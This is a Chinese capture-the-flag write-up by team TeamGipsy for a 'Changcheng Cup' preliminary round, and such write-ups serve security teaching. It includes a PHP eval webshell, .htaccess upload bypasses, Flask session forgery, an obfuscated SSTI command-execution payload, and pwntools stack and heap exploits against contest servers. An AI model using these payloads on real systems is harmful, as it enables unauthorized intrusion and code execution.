第四届“长城杯”网络安全大赛 暨京津冀网络安全技能竞赛(初赛) 全方向 题解WriteUp

战队名称:TeamGipsy

战队排名:18

SQLUP

题目描述:a website developed by a novice developer.

开题,是个登录界面。

账号admin,随便什么密码都能登录

点击头像可以进行文件上传

先简单上传个木马试试

测一下,发现文件后缀不可以带p。选择用.htaccess文件进行利用

前提:Apache的httpd.conf中AllowOverride=All 
特征:如果服务器是黑名单检测的话,通常会禁用php等脚本文件,不一定会禁用.htaccess文件. 
绕过方式:先上传.htaccess文件,再上传一个文件名符合.htaccess特定代码的jpg文件,服务器会将jpg文件当做php文件来解析执行。
内容格式:
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
也可以是:
AddType application/x-httpd-php.png
还可以是:(自动base64解码后包含) //Polar  上传
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.png"
如果过滤lfile,用 \空格换行 绕过 
有文件头要求的需要进行base补位  //古剑山2023-upload
AddType application/x-httpd-php .png
php_value auto_append_fi\ 
le "php://filter/convert.base64-decode/resource=shell.png"


-----------------------------------------------------------------------
原理:
.htaccess nginx.htaccess(apache和nginx的配置文件,可修改php解释器的各项功能)可覆盖php.ini里面的内容(php.ini是最大的配置文件)

虚拟主机时代     一个物理服务器,里面可能存放几十上百个网站 每个网站,一个目录 
     A 网站  需要这样的php.ini配置
     B 网站  却需要那样的php.ini配置
     C 网站  又需要另外的php.ini配置 
但是总的php.ini不动,A B C 3个网站分别在自己目录定义自己的配置,作用域也仅限于自己目录 
所以自定义配置文件   .htaccess nginx.htaccess

自动base64解码1.gif后包含

AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.gif"

1.gif内容:

PD9waHAgZWNobyAiSmF5MTciO2V2YWwoJF9QT1NUWzFdKTs/Pg==  #<?php echo "Jay17";eval($_POST[1]);?>

再上传个shell.gif,自动包含1.gif内容

getshell

flag{29899671-82e8-41cf-80ee-4b27515bef95}

CandyShop

题目描述:小明成为了CandyShop的店员,老板要求他卖出500个糖果,但是每个人只能买10个,小明不知道怎么办了,你能帮帮他吗?

拿下三血~

附件下载源码:

python 复制代码
import datetime
from flask import Flask, render_template, render_template_string, request, redirect, url_for, session, make_response
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_wtf import FlaskForm
import re

app = Flask(__name__)

app.config['SECRET_KEY'] = 'xxxxxxx'


class RegistrationForm(FlaskForm):
    username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
    password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
    submit = SubmitField('Register')


class LoginForm(FlaskForm):
    username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
    password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
    submit = SubmitField('Login')


class Candy:
    def __init__(self, name, image):
        self.name = name
        self.image = image


class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password

    def verify_password(self, username, password):
        return (self.username == username) & (self.password == password)


class Admin:
    def __init__(self):
        self.username = ""
        self.identity = ""


def sanitize_inventory_sold(value):
    return re.sub(r'[a-zA-Z_]', '', str(value))


def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


candies = [Candy(name="Lollipop", image="images/candy1.jpg"),
           Candy(name="Chocolate Bar", image="images/candy2.jpg"),
           Candy(name="Gummy Bears", image="images/candy3.jpg")
           ]
users = []
admin_user = []


@app.route('/register', methods=['GET', 'POST'])
def register():
    form = RegistrationForm()
    if form.validate_on_submit():
        user = User(username=form.username.data, password=form.password.data)
        users.append(user)
        return redirect(url_for('login'))

    return render_template('register.html', form=form)


@app.route('/login', methods=['GET', 'POST'])
def login():
    form = LoginForm()
    if form.validate_on_submit():
        for u in users:
            if u.verify_password(form.username.data, form.password.data):
                session['username'] = form.username.data
                session['identity'] = "guest"
                return redirect(url_for('home'))

    return render_template('login.html', form=form)


inventory = 500
sold = 0


@app.route('/home', methods=['GET', 'POST'])
def home():
    global inventory, sold
    message = None
    username = session.get('username')
    identity = session.get('identity')

    if not username:
        return redirect(url_for('register'))

    if sold >= 10 and sold < 500:
        sold = 0
        inventory = 500
        message = "But you have bought too many candies!"
        return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)

    if request.method == 'POST':
        action = request.form.get('action')
        if action == "buy_candy":
            if inventory > 0:
                inventory -= 3
                sold += 3
            if inventory == 0:
                message = "All candies are sold out!"
            if sold >= 500:
                with open('secret.txt', 'r') as file:
                    message = file.read()

    return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)


@app.route('/admin', methods=['GET', 'POST'])
def admin():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
        return redirect(url_for('register'))
    admin = Admin()
    merge(session, admin)
    admin_user.append(admin)
    return render_template('admin.html', view='index')


@app.route('/admin/view_candies', methods=['GET', 'POST'])
def view_candies():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
        return redirect(url_for('register'))
    return render_template('admin.html', view='candies', candies=candies)


@app.route('/admin/add_candy', methods=['GET', 'POST'])
def add_candy():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
        return redirect(url_for('register'))
    candy_name = request.form.get('name')
    candy_image = request.form.get('image')
    if candy_name and candy_image:
        new_candy = Candy(name=candy_name, image=candy_image)
        candies.append(new_candy)
    return render_template('admin.html', view='add_candy')


@app.route('/admin/view_inventory', methods=['GET', 'POST'])
def view_inventory():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
        return redirect(url_for('register'))
    inventory_value = sanitize_inventory_sold(inventory)
    sold_value = sanitize_inventory_sold(sold)
    return render_template_string("商店库存:" + inventory_value + "已售出" + sold_value)


@app.route('/admin/add_inventory', methods=['GET', 'POST'])
def add_inventory():
    global inventory
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
        return redirect(url_for('register'))
    if request.form.get('add'):
        num = request.form.get('add')
        inventory += int(num)
    return render_template('admin.html', view='add_inventory')


@app.route('/')
def index():
    return render_template('index.html')


if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=1337)

首先可以看到部分路由需要admin身份访问,同时有flask session,密钥是7位。

开题,注册登陆Jay17/111111

拿到session

eyJjc3JmX3Rva2VuIjoiZjA1YjlmY2FkMjczNzcyNDFhYjY1ZWZhZGY2YmYzOWE2NWY5YzcxNSIsImlkZW50aXR5IjoiZ3Vlc3QiLCJ1c2VybmFtZSI6IkpheTE3In0.Zt00Pw.GxBaXRtuaBeDFi8npGhKn2J1-cc

起手session爆破密钥。密钥是a123456

python 复制代码
import itertools
import flask_unsign
from flask_unsign.helpers import wordlist
import requests as r
import time
import re
import sys

path = "../my_wordlist.txt"

print("Generating wordlist... ")

#如果wordlist.txt为自定义字典,注释掉下面三行
# with open(path,"w") as f:
#     #permutations with repetition
#     [f.write(''+"".join(x)+''+"\n") for x in itertools.product('0123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPLKJHGFDSAZXCVBNM', repeat=4)]   #加上前缀

#url = "http://47.115.201.35:8000/index"
#cookie_tamper = r.head(url).cookies.get_dict()['session']
cookie_tamper='eyJjc3JmX3Rva2VuIjoiZjA1YjlmY2FkMjczNzcyNDFhYjY1ZWZhZGY2YmYzOWE2NWY5YzcxNSIsImlkZW50aXR5IjoiZ3Vlc3QiLCJ1c2VybmFtZSI6IkpheTE3In0.Zt00Pw.GxBaXRtuaBeDFi8npGhKn2J1-cc'
print("Got cookie: " + cookie_tamper)

print("Cracker Started...")

obj = flask_unsign.Cracker(value=cookie_tamper)

before = time.time()

with wordlist(path, parse_lines=False) as iterator:
            obj.crack(iterator)

secret = ""
if obj.secret:
    secret =obj.secret.decode()
    print(f"Found SECRET_KET ~{secret}~ in {time.time()-before} seconds")

signer = flask_unsign.sign({"time":time.time(),"authorized":True},secret=secret)

**解密session:**flask-unsign --decode --cookie '获得的session'

flask-unsign --decode --cookie 'eyJjc3JmX3Rva2VuIjoiZjA1YjlmY2FkMjczNzcyNDFhYjY1ZWZhZGY2YmYzOWE2NWY5YzcxNSIsImlkZW50aXR5IjoiZ3Vlc3QiLCJ1c2VybmFtZSI6IkpheTE3In0.Zt00Pw.GxBaXRtuaBeDFi8npGhKn2J1-cc'

**加密session:**flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

flask-unsign --sign --cookie "{'csrf_token': 'f05b9fcad27377241ab65efadf6bf39a65f9c715', 'identity': 'admin', 'username': 'Jay17'}" --secret 'a123456'

eyJjc3JmX3Rva2VuIjoiZjA1YjlmY2FkMjczNzcyNDFhYjY1ZWZhZGY2YmYzOWE2NWY5YzcxNSIsImlkZW50aXR5IjoiYWRtaW4iLCJ1c2VybmFtZSI6IkpheTE3In0.Zt00yA.ArWLgtc-_3I92l3qPfUvGCSaUXE

成功获取admin权限

解锁所有功能后,接下来就是思考如何把糖果变到500。

发现/admin路由下有原型链污染

我们直接污染全局变量sold修改糖果数量

json 复制代码
{
    '__init__':{
        '__globals__':{
            'sold':501
        } 
    }
}

session加密一下

flask-unsign --sign --cookie "{'csrf_token': 'f05b9fcad27377241ab65efadf6bf39a65f9c715', 'identity': 'admin', 'username': 'Jay17','__init__':{'__globals__':{'sold':501}}}" --secret 'a123456'

.eJwly00KwyAQhuG7zLqLmFRFj9BLyPgzQWJGiHYRgnev0N33PvA9ENpFrtcjMVigRXpDAeOqN63Xt0CvZCKMpDxtBpUkE7SQ8IIcE_fc7_nCeGae9G3pYjzTpA_eQk9yLnPuzoF95t5L9VjaP1stEaxcxBjjB033KyA.Zt02hQ.JK2FDR4eKopf7rJigxJ0GD-Dd94

替换session后访问/admin路由触发原型链污染。

访问/admin/view_inventory路由发现污染成功,手上的糖果已经过500了

回到/home路由再买一下,获得secret.txt的文件内容

/tmp/xxxx/xxx/xxxx/flag

但是不可以直接读取,尝试过添加糖果为这个位置 或者 切换指定static静态目录到/tmp,都不行。

细细读下源码,发现一般的模板渲染都是安全的render_template(),唯有/admin/view_inventory路由下是render_template_string(),存在SSTI。

那么说我们污染inventory或者sold为SSTIpayload即可,后续发现只能污染inventorysold污染了会报错,咱为查明原因。存在限制是re.sub(r'[a-zA-Z_]', '', str(value)),用八进制绕过。

进行一下SSTI简单测试,无误:

flask-unsign --sign --cookie "{'csrf_token': 'f05b9fcad27377241ab65efadf6bf39a65f9c715', 'identity': 'admin', 'username': 'Jay17','__init__':{'__globals__':{'inventory':'{{7*7}}'}}}" --secret 'a123456'

那么接下来就是SSTI读取文件了

原始payload:

{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}

转八进制

.__class__转为['XXXXXX']
[0]不动
()不动
['eval']转为['XXXXXX']
('__import__("os").popen("【RCE】").read()')转为('XXXXXX')

payload:(单引号和斜杠转义一下)

{{\'\'[\'\\137\\137\\143\\154\\141\\163\\163\\137\\137\'][\'\\137\\137\\142\\141\\163\\145\\163\\137\\137\'][0][\'\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\']()[133][\'\\137\\137\\151\\156\\151\\164\\137\\137\'][\'\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\'][\'\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\'][\'\\145\\166\\141\\154\'](\'\\137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042

RCE的八进制

\\042\\051\\056\\162\\145\\141\\144\\050\\051\')}}

命令如下:

find /tmp -name flag

tac /tmp/c05cac2af98893714d14d6107237f915/cbd2c352aaf912c8db7eabf2a9c71aa2/47ea5fa69ceb675b7023a3ff6b110012/flag

{{\'\'[\'\\137\\137\\143\\154\\141\\163\\163\\137\\137\'][\'\\137\\137\\142\\141\\163\\145\\163\\137\\137\'][0][\'\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\']()[133][\'\\137\\137\\151\\156\\151\\164\\137\\137\'][\'\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\'][\'\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\'][\'\\145\\166\\141\\154\'](\'\\137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042

RCE的八进制

\\042\\051\\056\\162\\145\\141\\144\\050\\051\')}}

最终payload:

flask-unsign --sign --cookie "{'csrf_token': 'f05b9fcad27377241ab65efadf6bf39a65f9c715', 'identity': 'admin', 'username': 'Jay17','__init__':{'__globals__':{'inventory':'{{\'\'[\'\\137\\137\\143\\154\\141\\163\\163\\137\\137\'][\'\\137\\137\\142\\141\\163\\145\\163\\137\\137\'][0][\'\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\']()[133][\'\\137\\137\\151\\156\\151\\164\\137\\137\'][\'\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\'][\'\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\'][\'\\145\\166\\141\\154\'](\'\\137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042\\164\\141\\143\\040\\057\\164\\155\\160\\057\\143\\060\\065\\143\\141\\143\\062\\141\\146\\071\\070\\070\\071\\063\\067\\061\\064\\144\\061\\064\\144\\066\\061\\060\\067\\062\\063\\067\\146\\071\\061\\065\\057\\143\\142\\144\\062\\143\\063\\065\\062\\141\\141\\146\\071\\061\\062\\143\\070\\144\\142\\067\\145\\141\\142\\146\\062\\141\\071\\143\\067\\061\\141\\141\\062\\057\\064\\067\\145\\141\\065\\146\\141\\066\\071\\143\\145\\142\\066\\067\\065\\142\\067\\060\\062\\063\\141\\063\\146\\146\\066\\142\\061\\061\\060\\060\\061\\062\\057\\146\\154\\141\\147\\042\\051\\056\\162\\145\\141\\144\\050\\051\')}}'}}}" --secret 'a123456'

BrickGame

题目描述:通关小游戏即可获得flag。

直接玩小游戏就可以了,60秒找相同的卡牌,玩了一会儿,第三关稍微要集中注意。

漏洞探踪,流量解密

题目描述:网站遭遇异常攻击,通过日志与流量锁定攻击来源,阶段二的压缩包密码是攻击来源ip地址,比如127.0.0.1,对捕获的数据包进行解密,识别加密算法并还原flag。flag格式为flag:{xxxxx}

阶段一是流量文件和日志文件,题目提示密码是ip地址,打开看一下log文件发现地址,查找upload关键字,在192.168.30.234地址下发现成功上传了文件,根据题目提示成功解密第二阶段的压缩包,还是得到一个流量文件,打开过滤http流,追踪http一点点看发现有key文件,直接全部导出:

有密钥,猜测是rc4解密,把重复部分去掉,选择hex密钥格式,成功得到flag:

最安全的加密方式

题目描述:找到了一个最安全的加密方式,然后将自己的密码用这种方式加密起来,你能破解出来吗?

打开流量过滤http流,发现后门脚本qqq.php

大概看一下,两个关键密钥,脚本就是对传入的paylod进行拼接加密和二次利用,再向后发现一个rar,导出后发现需要密码,使用pass就可以解密,得到一堆字符串

发现第一行是f字母md5后的数据,猜测就是md5用脚本碰撞,每一行代表一个字母,脚本如下

python 复制代码
import hashlib

flag = ["8fa14cdd754f91cc6554c9e71929cce7",
    "2db95e8e1a9267b7a1188556b2013b33",
    "0cc175b9c0f1b6a831c399e269772661",
    "b2f5ff47436671b6e533d8dc3614845d",
    "f95b70fdc3088560732a5ac135644506",
    "b9ece18c950afbfa6b0fdbfa4ff731d3",
    "2510c39011c5be704182423e3a695e91",
    "e1671797c52e15f763380b45e841ec32",
    "b14a7b8059d9c055954c92674ce60032",
    "6f8f57715090da2632453988d9a1501b",
    "cfcd208495d565ef66e7dff9f98764da",
    "03c7c0ace395d80182db07ae2c30f034",
    "e358efa489f58062f10dd7316b65649e",
    "b14a7b8059d9c055954c92674ce60032",
    "c81e728d9d4c2f636f067f89cc14862c",
    "e1671797c52e15f763380b45e841ec32",
    "4a8a08f09d37b73795649038408b5f33",
    "4c614360da93c0a041b22e537de151eb",
    "4b43b0aee35624cd95b910189b3dc231",
    "e1671797c52e15f763380b45e841ec32",
    "b14a7b8059d9c055954c92674ce60032",
    "e1671797c52e15f763380b45e841ec32",
    "8d9c307cb7f3c4a32822a51922d1ceaa",
    "4a8a08f09d37b73795649038408b5f33",
    "4b43b0aee35624cd95b910189b3dc231",
    "57cec4137b614c87cb4e24a3d003a3e0",
    "83878c91171338902e0fe0fb97a8c47a",
    "e358efa489f58062f10dd7316b65649e",
    "865c0c0b4ab0e063e5caa3387c1a8741",
    "d95679752134a2d9eb61dbd7b91c4bcc",
    "7b8b965ad4bca0e41ab51de7b31363a1",
    "9033e0e305f247c0c3c80d0c7848c8b3",
    "9033e0e305f247c0c3c80d0c7848c8b3",
    "9033e0e305f247c0c3c80d0c7848c8b3",
    "cbb184dd8e05c9709e5dcaedaa0495cf"
]
dic = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_!&{}'

for f in flag:
    for a in dic:
        if hashlib.md5(a.encode('utf-8')).hexdigest() == f:
            print(a, end='')
            break

得到flag :flag{The_m0st_2ecUre_eNcrYption!!!}

FlowerShop

题目描述:近期社区举办一个免费赠鲜花活动,主办方给出了活动网址,可以通过网址挑选鲜花,你看看能不能在本次活动中选到自己喜欢的鲜花。

read 有溢出 ,init中有个检测,写好pwn\x00就可以绕过,后面填金额。在shop中有check函数

V3验证要求

#a1==2 a

#a1[1] == 1 b

之后就是栈溢出,购买一次magic构造/bin/sh

EXP:

python 复制代码
from pwn import *
from LibcSearcher import *
io = process('./pwn')
elf = ELF('./pwn')
context(log_level='debug',arch=elf.arch,os=elf.os)
io = remote('8.147.131.74',17858)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
	gdb.attach(io)
	pause()
def get_addr():
	return u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
def get_sys():
	return libcbase + next(libc.search(b'/bin/sh\x00')), libcbase + libc.sym['system']
r 		= lambda num			: io.recv(num)
ru		= lambda data			: io.recvuntil(data)
rl		= lambda			: io.recvline()
s 		= lambda data 			: io.send(data)
sl 		= lambda data 			: io.sendline(data)
sla		= lambda data,pay		: io.sendlineafter(data,pay)
uu64 		= lambda size			: u64(io.recv(size).ljust(8,b'\x00'))
uu32		= lambda size			: u32(io.recv(size).ljust(4,b'\x00'))
itr 		= lambda 			: io.interactive()
li		= lambda x 			: print('\x1b[01;38;5;214m' + x + '\x1b[0m')

rdi = 0x400f13
ru('姓名:\n')
s(b'\x00'*0x34+b'pwn\x00' + b'aaaa'*4)#0x38
#a1==2      a  
#a1[1] == 1 b

#debug()
ru("选项:\n")
sl(b'a')
ru('序号:\n')
sl("c")
ru(b'1/0\n')
sl(b'1')

ru('序号:\n')
sl("a")
ru(b'1/0\n')
sl(b'1')
ru('序号:\n')
sl("a")
ru(b'1/0\n')
sl(b'1')
ru('序号:\n')
#debug()
sl("b")

pay = b'a'*0x18 + p64(rdi) + p64(0x601840) + p64(rdi+1) + p64(elf.plt['system'])
s(pay)
sleep(0.1)
sl("cat /f*")
itr()

Kylin_Heap

题目描述:Exploring user mode exploitation on KylinOS is absolutely captivating!

简单uaf,libc是2.31打free_hook

EXP:

python 复制代码
from pwn import *
from LibcSearcher import *
#io = process('./Heap')
elf = ELF('./Heap')
context(log_level='debug',arch=elf.arch,os=elf.os)
io = remote('8.147.128.54',18461)
libc = ELF('./libc-2.31-0kylin9.2k0.2.so')
def debug():
	gdb.attach(io)
	pause()
def get_addr():
	return u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
def get_sys():
	return libcbase + next(libc.search(b'/bin/sh\x00')), libcbase + libc.sym['system']
r 		= lambda num			: io.recv(num)
ru		= lambda data			: io.recvuntil(data)
rl		= lambda			: io.recvline()
s 		= lambda data 			: io.send(data)
sl 		= lambda data 			: io.sendline(data)
sla		= lambda data,pay		: io.sendlineafter(data,pay)
uu64 		= lambda size			: u64(io.recv(size).ljust(8,b'\x00'))
uu32		= lambda size			: u32(io.recv(size).ljust(4,b'\x00'))
itr 		= lambda 			: io.interactive()
li		= lambda x 			: print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def add(size,content):
	ru(b'What will you do, adventurer? ')
	sl(str(1))
	ru(b'bytes): ')
	sl(str(size))
	ru(b'bytes):')
	s(content)
def free(index):
	ru(b'What will you do, adventurer? ')
	sl(str(2))
	ru(b'index (0-19): ')
	sl(str(index))
def edit(index,content):
	ru(b'What will you do, adventurer? ')
	sl(str(3))
	ru(b'index (0-19): ')
	sl(str(index))
	ru(b'bytes):')
	s(content)
def show(index):
	ru(b'What will you do, adventurer? ')
	sl(str(4))
	ru(b'index (0-19): ')
	sl(str(index))
add(0x418,b'a')
add(0x68,b'a')
add(0x68,b'a')
add(0x68,b'a')
add(0x68,b'a')
free(0)
free(1)
free(2)
show(0)
ru(b'block')
rl()
libcbase = uu64(6) - 2014176
li(hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
bin,sys = get_sys()
edit(2,p64(free_hook))
add(0x68,b'/bin/sh\x00')
add(0x68,p64(sys))
free(5)
#debug()
sl("cat /f*")
itr()

easyre

题目描述:无

拿到附件,没壳,直接ida分析

拿到伪代码,用了插件查看有没有什么加密算法,没有,那就只能老老实实分析异或了,仔细看看,异或的密钥就是本身,然后在继续往下分析的时候,看到一个数据,

恰好43位,然后就写个脚本试试看,解密出来是什么东西,

c 复制代码
#include <stdio.h>

int main() {
    unsigned char enc[] = {
        0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03,
        0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02,
        0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57,
        0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04,
        0x4A, 0x77, 0x0D
    };
    int enc_len = sizeof(enc) / sizeof(enc[0]);
    int xor_index[enc_len];

    int v4 = 1;
    for (int i = 0; i < enc_len; i++) {
        int num1 = i + 1 + -42 * (v4 / 0x2A);
        xor_index[i] = num1;
        v4 += 1;
    }

    int num = enc_len - 1;
    for (int i = enc_len - 1; i >= 0; i--) {
        enc[i] ^= enc[xor_index[num]];
        num--;
    }

    printf("Decrypted bytes: ");
    for (int i = 0; i < enc_len; i++) {
        printf("%c", enc[i]);
    }
    printf("\n");

    return 0;
}

发现居然拿到flag了

RandomRSA

题目描述:A特工从敌方服务器获取到了一份带有hint的机密文件,请协助破解加密。

p , q p, q p,q由LCG生成,给定LCG的 p , a , b p,a,b p,a,b​
p p = x + c 1 q q = a ∗ x + b + c 2   m o d   p n = p p ∗ q q = ( x + c 1 ) ∗ ( a ∗ x + b + c 2 )   m o d   p pp = x+c1\\qq=a*x+b+c2 \bmod p\\ n = pp*qq =(x+c1)*(a*x+b+c2)\bmod p pp=x+c1qq=a∗x+b+c2modpn=pp∗qq=(x+c1)∗(a∗x+b+c2)modp
c 1 , c 2 c1,c2 c1,c2是LCG生成数与其下一个素数的差值,爆破 c 1 , c 2 c1,c2 c1,c2,求解上述方程可以求出 p p , q q pp,qq pp,qq。

python 复制代码
p, a, b = 170302223332374952785269454020752010235000449292324018706323228421794605831609342383813680059406887437726391567716617403068082252456126724116360291722050578106527815908837796377811535800753042840119867579793401648981916062128752925574017615120362457848369672169913701701169754804744410516724429370808383640129, 95647398016998994323232737206171888899957187357027939982909965407086383339418183844601496450055752805846840966207033179756334909869395071918100649183599056695688702272113280126999439574017728476367307673524762493771576155949866442317616306832252931038932232342396406623324967479959770751756551238647385191314, 122891504335833588148026640678812283515533067572514249355105863367413556242876686249628488512479399795117688641973272470884323873621143234628351006002398994272892177228185516130875243250912554684234982558913267007466946601210297176541861279902930860851219732696973412096603548467720104727887907369470758901838
n, c = 5593134172275186875590245131682192688778392004699750710462210806902340747682378400226605648011816039948262008066066650657006955703136928662067931212033472838067050429624395919771757949640517085036958623280188133965150285410609475158882527926240531113060812228408346482328419754802280082212250908375099979058307437751229421708615341486221424596128137575042934928922615832987202762651904056934292682021963290271144473446994958975487980146329697970484311863524622696562094720833240915154181032649358743041246023013296745195478603299127094103448698060367648192905729866897074234681844252549934531893172709301411995941527, 2185680728108057860427602387168654320024588536620246138642042133525937248576850574716324994222027251548743663286125769988360677327713281974075574656905916643746842819251899233266706138267250441832133068661277187507427787343897863339824140927640373352305007520681800240743854093190786046280731148485148774188448658663250731076739737801267702682463265663725900621375689684459894544169879873344003810307496162858318574830487480360419897453892053456993436452783099460908947258094434884954726862549670168954554640433833484822078996925040310316609425805351183165668893199137911145057639657709936762866208635582348932189646
from gmpy2 import mpz, isqrt, powmod, invert, is_prime
import concurrent.futures
import tqdm
import os
from Crypto.Util.number import *

# 模数 p 和多项式的系数 a, b, 以及 n
p = mpz(p)  # LCG 中的模数
a = mpz(a)  # LCG 的乘数
b = mpz(b)  # LCG 的增量
n = mpz(n)  # RSA 模数


# 求解方程中的 x
def solve_quadratic_mod(a, b, c, p):
    """求解模数 p 下的二次方程 a*x^2 + b*x + c ≡ 0 (mod p)"""
    # 计算判别式 Δ = b^2 - 4ac (mod p)
    discriminant = (b * b - 4 * a * c) % p

    # 判断判别式是否有解
    if gmpy2.jacobi(discriminant, p) != 1:
        return None  # 没有平方根,二次方程无解

    sqrt_discriminant = sympy.nthroot_mod(discriminant, 2, p)

    # 计算 2a 的逆元
    inv_2a = gmpy2.invert(2 * a, p)

    # 求解方程 x = (-b ± sqrt(Δ)) / 2a (mod p)
    x1 = ((-b + sqrt_discriminant) * inv_2a) % p
    x2 = ((-b - sqrt_discriminant) * inv_2a) % p
    return x1, x2


# 并行处理多个 c1 值
def process_c1_range(c1_start, c1_end):
    results = []
    for c1 in range(c1_start, c1_end):
        for c2 in range(1000):
            # 构建模数下的二次方程
            b_prime = (b + c2 + a * c1) % p
            c_prime = (c1 * (b + c2) - n) % p

            # 求解二次方程
            res = solve_quadratic_mod(a, b_prime, c_prime, p)

            # 检查解是否存在
            if res:
                x1, x2 = res
                p1_x1 = (x1 + c1) % p
                p2_x1 = (a * x1 + b + c2) % p
                p1_x2 = (x2 + c1) % p
                p2_x2 = (a * x2 + b + c2) % p

                # 检查是否为素数并且满足 p1_x1 * p2_x1 == n
                if is_prime(p1_x1) and is_prime(p2_x1) and p1_x1 * p2_x1 == n:
                    results.append((c1, c2, x1))
                if is_prime(p1_x2) and is_prime(p2_x2) and p1_x2 * p2_x2 == n:
                    results.append((c1, c2, x2))
    return results


# 多进程执行主函数
def main():
    results = []

    num_cpus = os.cpu_count()  # 获取可用CPU核数
    chunk_size = 10  # 每个任务处理10个c1
    total_c1 = 1000  # c1的总范围

    with concurrent.futures.ProcessPoolExecutor(max_workers=num_cpus) as executor:
        futures = []

        # 将c1范围分块提交给进程池
        for c1_start in range(0, total_c1, chunk_size):
            c1_end = min(c1_start + chunk_size, total_c1)
            futures.append(executor.submit(process_c1_range, c1_start, c1_end))

        # 收集结果
        for future in tqdm.tqdm(concurrent.futures.as_completed(futures)):
            result = future.result()
            if result:
                results.extend(result)
                break  # 找到结果后提前退出

    # 输出找到的结果
    if results:
        print("找到的结果: ", results)
        c1, c2, x = results[0]
        pp = x + c1
        qq = (a * x + b + c2) % p
        print((x + c1) * (a * x + b + c2) % p == n % p)
        print(is_prime(pp), is_prime(qq), pp * qq == n)
        d = invert(65537, (pp - 1) * (qq - 1))
        print(long_to_bytes(pow(c, d, pp * qq)))
    else:
        print("没有找到符合条件的 c1 和 c2")


# 运行主函数
if __name__ == '__main__':
    main()
    
找到的结果:  [(400, 777, mpz(38534082358492594770386164237787365358541687418861187872713633582773421830071965767156849758539753005265646728268013378441910869242213934859104106129143840904759207713228020635783396836155221721670963919289892982570525749738495868163606321994100244126498346427863605167635338350807757317686146416624471446841))]
# True
# True True True
# b'flag{j1st_e_s1mp1e_b3ute}'
相关推荐
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
独行soc4 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee5 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash5 小时前
安全算法基础(一)
算法·安全
云云3215 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3215 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh6 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n6 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
安全小王子7 小时前
Kali操作系统简单介绍
网络·web安全
光路科技8 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全